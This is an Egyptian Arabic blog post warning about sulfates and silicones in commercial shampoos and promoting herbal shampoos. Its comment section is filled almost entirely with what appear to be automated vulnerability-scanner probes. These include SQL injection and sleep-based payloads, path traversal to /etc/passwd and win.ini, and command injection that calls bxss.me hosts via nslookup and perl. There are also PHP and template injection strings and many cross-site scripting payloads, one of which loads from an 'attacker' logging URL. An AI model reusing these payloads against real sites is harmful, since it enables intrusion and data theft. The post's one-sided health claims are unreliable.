أضرار الشامبوهات التجارية اللي بنستخدمها و احتوائها على مواد كتيره بتضر بصحة شعرنا و نفهم مع بعض يعني ايه كلمة شامبو فري سلفات أو فري سيليكون .
أولا مادة ال sodium lauryl sulfate أو sls أو المشتقات المختلفة لمادة ال sulfate أو الكبريتات
المادة دي هي المسئولة عن الرغوة الكتير اللي بتعملوا الشامبوهات التجارية بس للاسف الرغوه دي بتضر شعرنا مش بتفيده لان مادة ال sls عبارة عن منظف قوي جداً بتخلص الشعر من كل الزيوت الطبيعية اللي ربنا خلقها لتغذيته و ترطيبه فيصبح شعرنا جاف و ضعيف و يتقصف و يتساقط بسهولة
اما بالنسبة لمادة السيلكون فدي عبارة عن حاجه شبه البلاستيك الصناعي بتغلف الشعرايه .. هي اينعم في البداية بيدي لمعه للشعر و شكل حلو لكن هي ف نفس الوقت بتعزل الشعرايه و تمنع وصول اي ماده مفيده و مغذيه ليها و بتخليها متستفدش باي ماسكات أو زيوت بنحطها عليها و بالتالي بعد فتره قصيره يتحول الشعر لباهت و ضعيف و سهل يتساقط .. كمان مادة السيلكون مبينضفهاش غير السلفات فطالما وقفنا السلفات لازم نوقف إستخدام السيليكون علشان كده لازم نوقف اي شامبو أو بلسم فيهم مادة السيلكون
وطبعا برضو المفروض منستعملش لا بلسم ولا حمام كريم ولا سيرم بيحتوي علي السلفات أو السيلكون
وعشان كده أفضل حل وبديل آمن علي شعرك هي الشامبوهات العشبية الطبيعية 100% ، فهي تتكون من أعشاب طبيعية وليس لها أي أضرار علي شعرك.
682 التعليقات
e
1
1
1
1
1GkgaPmGO
1
1
1
1
1
1
1
1
1
1
1
-1 OR 2+789-789-1=0+0+0+1 --
-1 OR 3+789-789-1=0+0+0+1 --
-1 OR 2+262-262-1=0+0+0+1
-1 OR 3+262-262-1=0+0+0+1
-1\' OR 2+315-315-1=0+0+0+1 --
-1\' OR 3+315-315-1=0+0+0+1 --
-1\' OR 2+116-116-1=0+0+0+1 or \'SMNZdgZ8\'=\'
-1\' OR 3+116-116-1=0+0+0+1 or \'SMNZdgZ8\'=\'
-1" OR 2+418-418-1=0+0+0+1 --
-1" OR 3+418-418-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay \'0:0:15\' --
-1); waitfor delay \'0:0:15\' --
1 waitfor delay \'0:0:15\' --
iwZMB633\'; waitfor delay \'0:0:15\' --
-5 OR 735=(SELECT 735 FROM PG_SLEEP(15))--
-5) OR 469=(SELECT 469 FROM PG_SLEEP(15))--
-1)) OR 739=(SELECT 739 FROM PG_SLEEP(15))--
1kohiL4U\' OR 937=(SELECT 937 FROM PG_SLEEP(15))--
vf6ncxpP\') OR 857=(SELECT 857 FROM PG_SLEEP(15))--
bXixNRav\')) OR 13=(SELECT 13 FROM PG_SLEEP(15))--
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'
1\'"
@@H1BYt
1
1
1
1
response.write(9226274*9654423)
\'+response.write(9226274*9654423)+\'
1<esi:include src="http://bxss.me/rpb.png"/>
${9999317+9999305}
1
"+response.write(9226274*9654423)+"
1
1
1
1
1
../../../../../../../../../../../../../../etc/passwd
1
1
1
1
../../../../../../../../../../../../../../windows/win.ini
1
1
1
1
../1
1
1
1
1
1
./1
1
1
1
../../../../../../../../../../../../../../../proc/version
1
1
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
1
1
1
1
1
\'.gethostbyname(lc(\'hitnd\'.\'abizbmjod10f2.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(100).chr(69).chr(118).chr(90).\'
../../../../../../../../../../etc/passwd\0.jpg
".gethostbyname(lc("hitmr"."kjyhsaav707e8.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(72).chr(106).chr(79)."
1
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
1
/../..//../..//../..//../..//../..//etc/passwd\0.jpg
1
.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd
1
)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
HttP://bxss.me/t/xss.html?%00
1
/etc/passwd
bxss.me/t/xss.html?%00
!(()&&!|*|*|
1some_inexistent_file_with_long_name\0.jpg
%2fetc%2fpasswd
^(#$!@#$)(()))******
Http://bxss.me/t/fit.txt
1
/.././.././.././.././.././.././.././../etc/./passwd%00
1
echo lzaefo$()\\ jndjsf\\nz^xyu||a #\' &echo lzaefo$()\\ jndjsf\\nz^xyu||a #|" &echo lzaefo$()\\ jndjsf\\nz^xyu||a #
http://bxss.me/t/fit.txt?.jpg
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
1
1
&echo hwargi$()\\ tudcut\\nz^xyu||a #\' &echo hwargi$()\\ tudcut\\nz^xyu||a #|" &echo hwargi$()\\ tudcut\\nz^xyu||a #
bxss.me
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
1
|echo uqjhvy$()\\ yrwpvo\\nz^xyu||a #\' |echo uqjhvy$()\\ yrwpvo\\nz^xyu||a #|" |echo uqjhvy$()\\ yrwpvo\\nz^xyu||a #
1
../././../././../././../././../././../././../././../././../././../././etc/passwd
(nslookup hithhgnuwmxmm14465.bxss.me||perl -e "gethostbyname(\'hithhgnuwmxmm14465.bxss.me\')")
;assert(base64_decode(\'cHJpbnQobWQ1KDMxMzM3KSk7\'));
1
\';print(md5(31337));$a=\'
$(nslookup hitysehjaeiih49e58.bxss.me||perl -e "gethostbyname(\'hitysehjaeiih49e58.bxss.me\')")
1
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
";print(md5(31337));$a="
&(nslookup hituqbwdfbqro71e90.bxss.me||perl -e "gethostbyname(\'hituqbwdfbqro71e90.bxss.me\')")&\'\\"`0&(nslookup hituqbwdfbqro71e90.bxss.me||perl -e "gethostbyname(\'hituqbwdfbqro71e90.bxss.me\')")&`\'
1
1
1
file:///etc/passwd
|(nslookup hitjaecjycrxc1451c.bxss.me||perl -e "gethostbyname(\'hitjaecjycrxc1451c.bxss.me\')")
${@print(md5(31337))}
1
1
/\\../\\../\\../\\../\\../\\../\\../etc/passwd
${@print(md5(31337))}\\
\'.print(md5(31337)).\'
"+"A".concat(70-3).concat(22*4).concat(100).concat(71).concat(107).concat(90)+(require"socket"\nSocket.gethostbyname("hittj"+"psorqadde52f7.bxss.me.")[3].to_s)+"
`(nslookup hitpxufbtosumb4197.bxss.me||perl -e "gethostbyname(\'hitpxufbtosumb4197.bxss.me\')")`
1
\'+\'A\'.concat(70-3).concat(22*4).concat(117).concat(74).concat(112).concat(82)+(require\'socket\'\nSocket.gethostbyname(\'hitty\'+\'xnsmhlrcec694.bxss.me.\')[3].to_s)+\'
1
/WEB-INF/web.xml
;(nslookup hitedhvzfswfr9ab8e.bxss.me||perl -e "gethostbyname(\'hitedhvzfswfr9ab8e.bxss.me\')")|(nslookup hitedhvzfswfr9ab8e.bxss.me||perl -e "gethostbyname(\'hitedhvzfswfr9ab8e.bxss.me\')")&(nslookup hitedhvzfswfr9ab8e.bxss.me||perl -e "gethostbyname(\'hitedhvzfswfr9ab8e.bxss.me\')")
1
C:\\WINDOWS\\system32\\drivers\\etc\\hosts
1
1
../../../../../../../../../../windows/win.ini\0.jpg
1
1
1
/../../../../../../../../../../boot.ini
1
1
1
1
1
1
1
1
..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
1
1
index.php
1
..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
1
1
index.php
1
/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini
index.php/.
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
1
unexisting/../../../../../../../../../../windows/win.ini.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\
1
1
1
WEB-INF/web.xml
1
1
WEB-INF\\web.xml
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
\'"
1
/xfs.bxss.me
<!--
966281
http://xfs.bxss.me
1
//xfs.bxss.me
1
1
/\\xfs.bxss.me
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1\'"()&%<acx><ScRiPt >qg2z(9408)</ScRiPt>
\'"()&%<acx><ScRiPt >qg2z(9577)</ScRiPt>
1
19108243
<%={{={@{#{${acx}}%>
1
<th:t="${acx}#foreach
1}}"}}\'}}1%>"%>\'%><%={{={@{#{${acx}}%>
acx{{98991*97996}}xca
1
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
1
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
<%={{={@{#{${acx}}%>
<th:t="${acx}#foreach
1
1}}"}}\'}}1%>"%>\'%><%={{={@{#{${acx}}%>
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
1
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1
1
1
1
1
1
1
1
1
1
1\'"()&%<acx><ScRiPt >WZ1C(9444)</ScRiPt>
1
\'"()&%<acx><ScRiPt >WZ1C(9733)</ScRiPt>
1
1
1
19453917
1
1
1
acu4949<s1﹥s2ʺs3ʹuca4949
1
1
<%={{={@{#{${acx}}%>
1
1
1
1
<th:t="${acx}#foreach
1
1
1
1
1
1
1
1}}"}}\'}}1%>"%>\'%><%={{={@{#{${acx}}%>
1
1
1
1
1
acx{{98991*97996}}xca
1
acx[[${98991*97996}]]xca
1
1
acx__${98991*97996}__::.x
1
1
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1
1<ScRiPt >WZ1C(9415)</ScRiPt>
1
1
1<WDCMKO>KJTC8[!+!]</WDCMKO>
1
1
1
1
1<script>WZ1C(9344)</script>
1
1
1<ScR<ScRiPt>IpT>WZ1C(9798)</sCr<ScRiPt>IpT>
1
1
1<ScRiPt \r\n>WZ1C(9273)</ScRiPt>
1
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9614></ScRiPt>
1
1
1<\0ScRiPt \r\n>WZ1C(9084)</ScRiPt>
1
1
1
1
1<isindex type=image src=1 onerror=WZ1C(9288)>
1
1<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9034\'>
1
1
1<body onload=WZ1C(9273)>
1
1
1<img src=//xss.bxss.me/t/dot.gif onload=WZ1C(9012)>
1
1<img src=xyz OnErRor=WZ1C(9876)>
1
1
1
1<img/src=">" onerror=alert(9706)>
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%57%5A%31%43%289998%29%3C%2F%73%43%72%69%70%54%3E
1
1
1\\u003CScRiPt\\WZ1C(9991)\\u003C/sCripT\\u003E
1
1<ScRiPt>WZ1C(9695)</sCripT>
1
1
1
1
1
1<input autofocus onfocus=WZ1C(9477)>
1
<a HrEF=http://xss.bxss.me></a>
1
1
1
<a HrEF=jaVaScRiPT:>
1
1}body{acu:Expre/**/SSion(WZ1C(9095))}
1
1
1
1<% contenteditable onresize=WZ1C(9153)>
1
19Cj0m\n<ScRiPt >WZ1C(9569)</ScRiPt>
1
1
1<WTOGTS>ZDRZT[!+!]</WTOGTS>
1
1
1
1
1<ifRAme sRc=9332.com></IfRamE>
1
1
1<D0Eicx x=9321>
1
1
1<img sRc=\'http://attacker-9931/log.php?
1
1
1
1
1<IwnlTa<
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1\'"()&%<acx><ScRiPt >LSGx(9418)</ScRiPt>
\'"()&%<acx><ScRiPt >LSGx(9881)</ScRiPt>
19267225
acu7208<s1﹥s2ʺs3ʹuca7208
<%={{={@{#{${acx}}%>
1
<th:t="${acx}#foreach
1
1}}"}}\'}}1%>"%>\'%><%={{={@{#{${acx}}%>
1
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1<ScRiPt >LSGx(9081)</ScRiPt>
1<WGURT5>7FXFK[!+!]</WGURT5>
1<script>LSGx(9357)</script>
1<ScR<ScRiPt>IpT>LSGx(9789)</sCr<ScRiPt>IpT>
1<ScRiPt \r\n>LSGx(9659)</ScRiPt>
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9220></ScRiPt>
1<\0ScRiPt \r\n>LSGx(9757)</ScRiPt>
1<isindex type=image src=1 onerror=LSGx(9576)>
1
1<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9140\'>
1<body onload=LSGx(9819)>
1
1<img src=//xss.bxss.me/t/dot.gif onload=LSGx(9323)>
1
1<img src=xyz OnErRor=LSGx(9036)>
1<img/src=">" onerror=alert(9128)>
%31%3C%53%63%52%69%50%74%20%3E%4C%53%47%78%289528%29%3C%2F%73%43%72%69%70%54%3E
1\\u003CScRiPt\\LSGx(9368)\\u003C/sCripT\\u003E
1<ScRiPt>LSGx(9881)</sCripT>
1<input autofocus onfocus=LSGx(9192)>
1
<a HrEF=http://xss.bxss.me></a>
1
1
<a HrEF=jaVaScRiPT:>
1
1}body{acu:Expre/**/SSion(LSGx(9761))}
1
1
1<% contenteditable onresize=LSGx(9225)>
1
1k3nDP\n<ScRiPt >LSGx(9822)</ScRiPt>
1<WBJN0L>JGHXX[!+!]</WBJN0L>
1
1<ifRAme sRc=9207.com></IfRamE>
1
1<maAQbu x=9526>
1<img sRc=\'http://attacker-9791/log.php?
1<DC4VOS<
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
e
1
1
1
1
response.write(9277047*9698060)
\'+response.write(9277047*9698060)+\'
"+response.write(9277047*9698060)+"
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
1
1
../1
echo qbvqug$()\\ sxubga\\nz^xyu||a #\' &echo qbvqug$()\\ sxubga\\nz^xyu||a #|" &echo qbvqug$()\\ sxubga\\nz^xyu||a #
&echo yojwtl$()\\ wcdqfo\\nz^xyu||a #\' &echo yojwtl$()\\ wcdqfo\\nz^xyu||a #|" &echo yojwtl$()\\ wcdqfo\\nz^xyu||a #
./1
1<esi:include src="http://bxss.me/rpb.png"/>
|echo wxqnul$()\\ xvdhvf\\nz^xyu||a #\' |echo wxqnul$()\\ xvdhvf\\nz^xyu||a #|" |echo wxqnul$()\\ xvdhvf\\nz^xyu||a #
1
